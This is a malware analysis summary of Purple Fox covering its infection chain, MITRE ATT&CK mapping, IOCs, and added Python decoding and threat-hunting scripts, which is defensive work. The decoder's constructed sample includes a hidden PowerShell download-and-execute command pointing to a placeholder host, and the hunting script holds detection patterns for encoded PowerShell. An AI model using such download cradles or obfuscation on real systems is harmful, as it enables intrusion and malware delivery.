Purple Fox malware evolved from a payload delivered by the RIG exploit kit (RIG EK) into an independent threat that deploys a multi-stage, stealthy infection chain featuring a rootkit, LOLBIN abuse, and privilege escalation via public CVEs. The analysis maps observed behaviors to MITRE ATT&CK techniques, lists IOCs, and provides defensive recommendations including patching, threat hunting, and detections across endpoints and networks. Hashtags: #PurpleFox #RIG_EK #mshta #PowerShell #SMB #CVE-2020-0674 #M0071cab #ret6bcus
Keypoints
- Purple Fox uses rootkit components to evade detections by hiding registry keys and files on the infected machine.
- The malware abuses LOLBIN (Living Off the Land Binary), specifically mshta.exe, to execute malicious commands and defeat defenses.
- Purple Fox leverages multiple publicly available exploits to obtain privilege escalation on the host (CVE-2019-0808, CVE-2018-8120, CVE-2015-1701, CVE-2021-1675, and CVE-2020-0674). Note that CVE-2020-0674 is the Internet Explorer scripting-engine memory-corruption bug, i.e. the vulnerable IE instance from which the PowerShell stage is launched, rather than a local privilege-escalation flaw.
- eSentire TRU assesses with medium-to-high confidence that Purple Fox is linked to Chinese threat actors. Its recommendations focus on preventing reinfection, including firewall policies that block the malware's infrastructure.
- The malware shows worm-like behavior by brute-forcing SMB credentials to propagate to other reachable hosts.
- The drop/install chain delivers the payload as a CAB file (M0071.cab) installed through an MSI package, establishes registry-based persistence, and runs a hidden rootkit service whose DLL (Ms5C864EC6App.dll) is injected into svchost.exe processes.
MITRE Techniques
- [T1014] Rootkit – Rootkit components hide artifacts by masking registry keys and files on the infected machine. ‘rootkit components to avoid detections by hiding registry keys and files on the infected machine.’
- [T1218.005] System Binary Proxy Execution: Mshta – Mshta.exe is used to proxy-execute malicious content. “Mshta.exe is often abused by threat actor(s) to proxy execute malicious .hta files, Javascript, or PowerShell via VBScript.”
- [T1059.001] PowerShell – A base64-encoded PowerShell one-line command is spawned from a vulnerable IE instance to download and execute payloads. “launching a Base64-encoded PowerShell one-line command (Exhibit 1).”
- [T1105] Ingress Tool Transfer – The command downloads and launches i.php from a C2 domain. “downloading and launching the file i.php from a command and control (C2) domain.”
- [T1027] Obfuscated/Encoded Files and Information – The script uses XOR encoding and Base64-encoded payloads to conceal the content. “contents of i.php file contain the char codes that are XOR’ed (XOR or ‘exclusive or’ is a logical operator) with the hexadecimal value 0x26” and “The script contains multiple Base64-encoded payloads.”
- [T1112] Modify Registry – The malware writes and later checks a marker value, ‘StayOnTop’ under HKCU:\Software\7-Zip, to confirm that the payload has executed. “checks the registry for the value ‘StayOnTop’ under the mentioned registry path.”
- [T1021.002] Remote Services: SMB/Windows Admin Shares – Worm-like propagation: the malware brute-forces SMB credentials (the credential guessing itself maps to T1110.001, Brute Force: Password Guessing) to reach other machines. “SMB brute-forcing to gain access to other machines that are publicly exposed on the Internet.”
- [T1055] Process Injection – The rootkit DLL is injected into svchost.exe to maintain persistence and execution. “Ms5C864EC6App.dll gets injected into svchost processes…”
- [T1071.004] Application Layer Protocol: DNS – Command-and-control communication relies on DNS resolution through a dedicated resolver domain. “DNS resolver domain ret.6bc[.]us”
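To make the two decoding layers under T1027 and T1059.001 concrete, here is a decoder written for this page (an added example; it is not eSentire's tooling and not Purple Fox code). It reverses the scheme the analysis describes: integer character codes XOR'ed with 0x26 yield a script, and Base64 runs inside that script are decoded, with UTF-16LE detected because that is the encoding PowerShell's -EncodedCommand expects. The obfuscated sample is constructed here from a placeholder script (the example.invalid host and the stage-2 placeholder text are inventions of this example); only the 0x26 key comes from the page.

```python
"""Decoder for the i.php-style obfuscation described above (added example)."""
import base64
import re

XOR_KEY = 0x26  # the only value taken from the page: char codes are XOR'ed with 0x26

# Constructed sample, not the real i.php: a stage script that carries one
# UTF-16LE Base64 PowerShell command (the form -EncodedCommand expects) and
# one plain Base64 blob. The host name is a placeholder.
INNER_CMD = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/i.php')"
STAGE2_TEXT = "second-stage placeholder constructed for this demo"
ENC_CMD = base64.b64encode(INNER_CMD.encode("utf-16le")).decode()
BLOB2 = base64.b64encode(STAGE2_TEXT.encode()).decode()
SAMPLE_SCRIPT = (
    "var a = 1;\n"
    f"powershell -w hidden -enc {ENC_CMD}\n"
    f"var b = '{BLOB2}';\n"
)


def obfuscate(script: str, key: int = XOR_KEY) -> str:
    """Inverse of decode_charcodes; used here only to build the sample blob."""
    return ",".join(str(ord(c) ^ key) for c in script)


SAMPLE_BLOB = obfuscate(SAMPLE_SCRIPT)


def decode_charcodes(blob: str, key: int = XOR_KEY) -> str:
    """Layer 1: pull every integer out of the blob and XOR it back to a character."""
    return "".join(chr(int(n) ^ key) for n in re.findall(r"\d+", blob))


# A Base64 run of 40+ characters with optional padding; shorter runs are noise.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def bytes_to_text(raw: bytes) -> str:
    """PowerShell -EncodedCommand is UTF-16LE; detect it by the zero high bytes."""
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16le")
    return raw.decode("utf-8", errors="replace")


def extract_base64(script: str):
    """Layer 2: decode every Base64 run that validates; return (token, text) pairs."""
    found = []
    for m in B64_RE.finditer(script):
        token = m.group(0)
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        found.append((token, bytes_to_text(raw)))
    return found


def unpack(blob: str, key: int = XOR_KEY):
    """Run both layers: XOR'ed char codes -> script -> decoded Base64 payloads."""
    script = decode_charcodes(blob, key)
    return script, extract_base64(script)


if __name__ == "__main__":
    script, payloads = unpack(SAMPLE_BLOB)
    print(script)
    for token, text in payloads:
        print(f"{token[:24]}... -> {text}")
```

On a real sample, feed the raw i.php text to `unpack` and review every decoded payload; a Base64 run that decodes to binary rather than text is typically a dropped file and should be written out for hashing against the IOC list.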
Indicators of Compromise
- [Hash] i.php – 32d81dcfcf7ae1d000fd9332b3442eb4afa72674dda5bd0cb47c1faaa44c99b8
- [Hash] MSI Installer – 61ea42af8d93e9d6eee269c048983559f455a82ac387b3e08046cbe21a05ca64
- [Hash] M0071.cab – 42d20b11fef9c5beba6c6dbcc4d3bbd2d163bc4d50035d3604461a9c25b69e70
- [Hash] .log – 29c94fb2f3f0a3dc731854d27527f45a85d6b8658fb88e218954f5c76a93e270
- [Hash] dbcode86mk.log – 766d7995bc515cb656e91581e57217f1f745ba3136dd32ff12cf915521b129ad
- [Hash] Ms5C864EC6App.dll – 682e2ab27c4c773abfd2056625cb9fe60a78039ea009e0a83fc6d0ba18b0db6d
- [URL] hxxps[:]//kjt[.]bar/ – C2
- [Domain] ret.6bc[.]us – DNS resolver domain for C2
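The following hunting script is an added example (not eSentire's detection content) that turns the behaviors in the MITRE mapping and the IOCs above into checks run over constructed Sysmon and Security-log records: mshta.exe spawning an encoded PowerShell command, the StayOnTop marker being set under HKCU\Software\7-Zip, hashes and domains from the IOC list, and bursts of failed network logons (Security event 4625, logon type 3) of the kind an SMB-brute-forcing worm produces. The event IDs are Sysmon's (1 process create, 11 file create, 13 registry value set, 22 DNS query) and Windows' (4625); the flat dict field names, the thresholds, and every sample record are this example's own.

```python
"""Purple Fox hunting rules over flattened event records (added example)."""
import re
from collections import defaultdict

# SHA-256 values and domains copied from the IOC list above (domains re-fanged).
IOC_SHA256 = {
    "32d81dcfcf7ae1d000fd9332b3442eb4afa72674dda5bd0cb47c1faaa44c99b8",  # i.php
    "61ea42af8d93e9d6eee269c048983559f455a82ac387b3e08046cbe21a05ca64",  # MSI installer
    "42d20b11fef9c5beba6c6dbcc4d3bbd2d163bc4d50035d3604461a9c25b69e70",  # M0071.cab
    "682e2ab27c4c773abfd2056625cb9fe60a78039ea009e0a83fc6d0ba18b0db6d",  # Ms5C864EC6App.dll
}
IOC_DOMAINS = {"kjt.bar", "ret.6bc.us"}

# -e / -ec / -enc / -EncodedCommand followed by a Base64 run of 20+ characters.
ENC_FLAG = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
STAYONTOP_KEY = re.compile(r"(?i)\\software\\7-zip\\stayontop$")


def check_process(ev):
    """T1218.005 -> T1059.001: mshta.exe spawning an encoded PowerShell command."""
    if ev.get("event_id") != 1:
        return None
    parent = ev.get("parent_image", "").lower()
    image = ev.get("image", "").lower()
    if (parent.endswith("\\mshta.exe") and image.endswith("\\powershell.exe")
            and ENC_FLAG.search(ev.get("cmdline", ""))):
        return ("mshta_encoded_powershell", ev["cmdline"])
    return None


def check_registry(ev):
    """T1112: the StayOnTop execution marker written under ...\\Software\\7-Zip."""
    if ev.get("event_id") == 13 and STAYONTOP_KEY.search(ev.get("target_object", "")):
        return ("stayontop_marker", ev["target_object"])
    return None


def check_ioc(ev):
    """Static IOC matches: file hashes on process/file events, domains on DNS events."""
    if ev.get("event_id") in (1, 11) and ev.get("sha256", "").lower() in IOC_SHA256:
        return ("ioc_hash", ev["sha256"])
    if ev.get("event_id") == 22 and ev.get("query", "").lower().rstrip(".") in IOC_DOMAINS:
        return ("ioc_domain", ev["query"])
    return None


def check_bruteforce(events, threshold=10, window=60):
    """T1021.002 propagation: >= threshold failed network logons from one source in `window` s."""
    by_src = defaultdict(list)
    for ev in events:
        if ev.get("event_id") == 4625 and ev.get("logon_type") == 3:
            by_src[ev["src_ip"]].append(ev["ts"])
    hits = []
    for src, times in by_src.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j < len(times) and times[j] - times[i] <= window:  # sliding window
                j += 1
            if j - i >= threshold:
                hits.append(("smb_bruteforce", f"{src}: {j - i} failures in {window}s"))
                break
    return hits


def hunt(events, **bruteforce_kw):
    """Run the per-event rules, then the cross-event brute-force rule."""
    alerts = []
    for ev in events:
        for check in (check_process, check_registry, check_ioc):
            hit = check(ev)
            if hit:
                alerts.append(hit)
    alerts.extend(check_bruteforce(events, **bruteforce_kw))
    return alerts


# Constructed sample records (timestamps in seconds); hashes/domains from the IOC list.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"event_id": 1, "ts": 0, "parent_image": r"C:\Windows\System32\mshta.exe", "image": PS,
     "cmdline": "powershell -w hidden -enc " + "A" * 40, "sha256": ""},
    {"event_id": 1, "ts": 1, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell -File backup.ps1", "sha256": ""},  # benign: no mshta parent, no -enc
    {"event_id": 13, "ts": 2, "target_object": r"HKU\S-1-5-21-1\Software\7-Zip\StayOnTop"},
    {"event_id": 11, "ts": 3, "sha256": "42D20B11FEF9C5BEBA6C6DBCC4D3BBD2D163BC4D50035D3604461A9C25B69E70"},
    {"event_id": 22, "ts": 4, "query": "kjt.bar"},
] + [{"event_id": 4625, "ts": 10 + i, "logon_type": 3, "src_ip": "192.0.2.7"} for i in range(12)] \
  + [{"event_id": 4625, "ts": 100 + 30 * i, "logon_type": 3, "src_ip": "192.0.2.9"} for i in range(4)]

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

The brute-force threshold is deliberately a parameter: on a network where a scanner or a misconfigured service account also trips 4625 bursts, raise it or add a distinct-target-count condition rather than disabling the rule, since the SMB spray is the behavior that turns one infected host into many.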
Read more: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-purple-fox